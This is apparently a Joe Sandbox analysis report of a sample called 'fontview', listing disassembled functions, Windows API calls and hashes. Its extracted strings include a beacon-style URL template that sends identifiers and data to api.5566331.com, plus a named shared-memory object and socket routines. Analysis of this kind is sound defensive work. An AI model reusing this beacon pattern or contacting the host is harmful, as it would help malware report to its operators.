Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandleMutexReleaseSleep$Startup
String ID:
API String ID: 3889887703-0
Opcode ID: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
Instruction ID: 77a9dc64d7ec4658a88107c2dfb50ea3d3ee354ef9d95e056dd7178ddb840d27
Opcode Fuzzy Hash: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
Instruction Fuzzy Hash: 36F03CB1510230AFFB41DF75DC8D75A3BA2FB1935AF024215F085961B2C7F85980CB5A

Function 10017BF7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 10017C1D

Strings

inc\http\HttpConnection.cpp, xrefs: 10017C09
Error (%s) in line: %d in file: %s, xrefs: 10017C18
pDataOut != NULL, xrefs: 10017C13
, xrefs: 10017C48, 10017C56

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _wprintf
String ID: $Error (%s) in line: %d in file: %s$inc\http\HttpConnection.cpp$pDataOut != NULL
API String ID: 2738768116-4064496196
Opcode ID: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
Instruction ID: b3279fd1f64e757fc39bef5126cbef0cf3ed16947356f535cad2a22282ac5a8b
Opcode Fuzzy Hash: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
Instruction Fuzzy Hash: 620108351006057AE331EA64CC41FD777B8EB20260F04095FF646961D3DB61FAC983A2

Function 1001B976 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00100000,?,?,1001A9D0), ref: 1001B9AD
CloseHandle.KERNEL32(?,?,1001A9D0), ref: 1001B9C2

Strings

Local\jkhgjfgs3gGwsef, xrefs: 1001B978

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID: Local\jkhgjfgs3gGwsef
API String ID: 1661045500-2024575643
Opcode ID: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
Instruction ID: 510e1f7a28177a6c4adca6b9fa798e7cec5f3aa40cb69a399bd7e5cf68b8c7d0
Opcode Fuzzy Hash: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
Instruction Fuzzy Hash: ADF0A9B1100632BBE7208B329C9CE873F68EF8A7B4F114210FA09DA1A0C730C442DAB0

Function 10007486 Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F

TerminateThread.KERNELBASE(00000234,00000000), ref: 100074FB
CloseHandle.KERNEL32(00000234), ref: 10007507
TerminateThread.KERNELBASE(00000218,00000000), ref: 10007516
CloseHandle.KERNEL32(00000218), ref: 10007522
CloseHandle.KERNEL32(00000274), ref: 1000752F

Part of subcall function 1000BDB5: __EH_prolog.LIBCMT ref: 1000BDBA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandle$TerminateThread$Sleep$closesocket$H_prolog
String ID:
API String ID: 3433561863-0
Opcode ID: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
Instruction ID: 825a54de0ef117b15b095b619e3c21a0ce1a9e7865436b8144138b74cdb72a88
Opcode Fuzzy Hash: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
Instruction Fuzzy Hash: 72110A75200B508BE728DF35CC48AA6B7E5EF44385F01482DE19F97165DB78F945CB10

Function 1000236C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10002371

Part of subcall function 1001BC82: __EH_prolog.LIBCMT ref: 1001BC87
Part of subcall function 1001BC82: LocalAlloc.KERNEL32(00000040,00000000,1005ADE8,1005AF8C,1005ADE8,00000000,10168660,00000000,00000000), ref: 1001BCE2
Part of subcall function 1001BC82: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD03
Part of subcall function 1001BC82: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD1A

_sprintf.LIBCMT ref: 100023F4

Strings

/index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s, xrefs: 100023EE
api.5566331.com, xrefs: 10002430

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prologLocal$AllocByteCharFreeMultiWide_sprintf
String ID: /index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s$api.5566331.com
API String ID: 1886346375-2983348053
Opcode ID: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
Instruction ID: ac0105269a1a7c84a4e52344445157f79487e8b33dc675cb9405ff6c2244ed2b
Opcode Fuzzy Hash: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
Instruction Fuzzy Hash: 89218175900148ABEB14DFA4CC55EDEB778EF14384F404469F406A7182EB70AE44CBE1

Function 10017B26 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10017B2B

Part of subcall function 10018235: __EH_prolog.LIBCMT ref: 1001823A
Part of subcall function 10018235: std::locale::_Init.LIBCPMT ref: 100182C4

Part of subcall function 10017D97: __EH_prolog.LIBCMT ref: 10017D9C

Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4

Part of subcall function 1001A313: _wprintf.LIBCMT ref: 1001A334
Part of subcall function 1001A313: send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
Part of subcall function 1001A313: WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 10017BC6

Part of subcall function 1003293B: std::ios_base::_Tidy.LIBCPMT ref: 1003295B

Strings

inc\http\HttpConnection.cpp, xrefs: 10017B38
Content-Length, xrefs: 10017B73

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog$_wprintfstd::ios_base::_$ErrorInitIos_base_dtorLastTidysendstd::locale::_
String ID: Content-Length$inc\http\HttpConnection.cpp
API String ID: 918007117-3146130545
Opcode ID: 40ef1619abf4a142944efc019406029fe1174e287281a86041d6dda7aacc45ce
Instruction ID: 75a4cd840f36df8d2ac12fee9985095fe0ae56a02b47657bfe69f213c4d39a4c
Opcode Fuzzy Hash: 40ef1619abf4a142944efc019406029fe1174e287281a86041d6dda7aacc45ce
Instruction Fuzzy Hash: A8110636900204ABD715E768CD13BEEB7B8EF41350F10015EF105AB192DB306F88C792

Function 1001A1E1 Relevance: 6.1, APIs: 4, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001A1E6
recv.WS2_32(?,?,00400000,00000000), ref: 1001A215
WSAGetLastError.WS2_32 ref: 1001A21F
recv.WS2_32(?,?,00400000,00000000), ref: 1001A2F7

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: recv$ErrorH_prologLast
String ID:
API String ID: 1189367603-0
Opcode ID: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
Instruction ID: b4c2601fb093304271381bf4d6a57f627c918c8f1ebe356989ccf57b4cacec91
Opcode Fuzzy Hash: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
Instruction Fuzzy Hash: 22314871900659EFDB10CBE8CC81BEEBBF8FF19354F10452AE416A7191DB74AA45CB60

Function 1001C12C Relevance: 6.1, APIs: 4, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001C131
__mbsinc.LIBCMT ref: 1001C177
PathIsDirectoryA.SHLWAPI(?), ref: 1001C1B5
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,1000E095,?,1005C6FC,?,?,?), ref: 1001C1D0

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Directory$CreateH_prologPath__mbsinc
String ID:
API String ID: 3676323035-0
Opcode ID: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
Instruction ID: 39af0d0c7e0004fa6f05bf9c636e80e62591e6cbe11adbc1e24eaa1d211b549f
Opcode Fuzzy Hash: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
Instruction Fuzzy Hash: 2F310836940549BFEB11CB68C890FDEBBA8EF42394F154169E4456B1C2DF70EE88CB90

Function 1000DA3F Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5

_malloc.LIBCMT ref: 1000DAD5

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_malloc.LIBCMT ref: 1000DAEF
_malloc.LIBCMT ref: 1000DB04
_malloc.LIBCMT ref: 1000DB1D

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateCreateGuidHeap_fprintf
String ID:
API String ID: 995246934-0
Opcode ID: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
Instruction ID: 0c794dbf93a883c59379ebb3549ba63955cc03bc23cb9c033a601534a3face92
Opcode Fuzzy Hash: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
Instruction Fuzzy Hash: 7231AFB4901B00DED361EF2A9584787FBE8EFA4390F11491FE4AA96661DBB4B540CF60

Function 1001DF6A Relevance: 6.0, APIs: 4, Instructions: 38networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 1001DF7C
WSAGetLastError.WS2_32(?,1001E0B2), ref: 1001DF89
setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001DFAB
setsockopt.WS2_32(?,0000FFFF,00001006,000003E8,00000004), ref: 1001DFBF

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: setsockopt$ErrorLastsocket
String ID:
API String ID: 1825786771-0
Opcode ID: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
Instruction ID: b2fa6c4f3e2365603d35b98d26ebd87122be398151743637c1c9ce2e762f7076
Opcode Fuzzy Hash: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
Instruction Fuzzy Hash: 9BF06DB154421ABFF710AB64CC8AF99BB6CDB08765F204325F312960E0DBF09E409621

Function 10011988 Relevance: 4.7, APIs: 3, Instructions: 190threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001198D
__time64.LIBCMT ref: 100119AE

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 10011C4E: __EH_prolog.LIBCMT ref: 10011C53

Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8

Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950

Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704

Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E

Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C

Part of subcall function 1000236C: __EH_prolog.LIBCMT ref: 10002371
Part of subcall function 1000236C: _sprintf.LIBCMT ref: 100023F4

CreateThread.KERNEL32(00000000,00000000,1000D4AD,?,00000000,00000000), ref: 10011BBE

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog$LocalTime_memmove_sprintf$AllocByteCharCreateFileFreeMultiSystemThreadWide__aulldiv__time64char_traits
String ID:
API String ID: 2736727069-0
Opcode ID: a164dce375776bab9a8840abe26e894697faddf913288d20eac01ec7679d546f
Instruction ID: 580e3e4189418ba42efff9c301c6a522281fecc5959f66fff071016f5e044300
Opcode Fuzzy Hash: a164dce375776bab9a8840abe26e894697faddf913288d20eac01ec7679d546f
Instruction Fuzzy Hash: B2718434900258EEEB14DBA4CD95BEDB7B8EF14340F50459AE40A77186EB706F89CFA1

Function 1001EAC0 Relevance: 4.6, APIs: 3, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10025E20: GetNativeSystemInfo.KERNELBASE(?,B7A91B76,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E61
Part of subcall function 10025E20: GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E7C

GetNativeSystemInfo.KERNEL32(?,B7A91B76,0000000F), ref: 1001EB35
HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
_free.LIBCMT ref: 1001EC31

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem$CreateHeap_free
String ID:
API String ID: 3771285432-0
Opcode ID: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
Instruction ID: 084453f00552fd9cdcf573a0b57787ee67f97c677d196269d3afbad7c3934e3d
Opcode Fuzzy Hash: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
Instruction Fuzzy Hash: 7951B4B0814B40DFE761CF25C948787BBE4FB09308F504A1DD8AA8BB90D7B9A548CF85

Function 100056F0 Relevance: 4.6, APIs: 3, Instructions: 97synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 10005734
ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 100057EF
Sleep.KERNELBASE(00000001), ref: 10005810

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleSleepWait
String ID:
API String ID: 2685543577-0
Opcode ID: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
Instruction ID: e715972c45bbafa45bd51ed1e775cbe0a086c7abb003f9553e746b27f7d06d24
Opcode Fuzzy Hash: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
Instruction Fuzzy Hash: 2231B535604B41DFEB24DF24C885A5BB7E4FF44391F108A2DE9AE972A5DB31A900CB52

Function 100022F0 Relevance: 4.5, APIs: 3, Instructions: 46networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

gethostname.WS2_32(?,00000100), ref: 1000230B
gethostbyname.WS2_32(?), ref: 1000233D
inet_ntoa.WS2_32(?), ref: 1000234E

Memory Dump Source

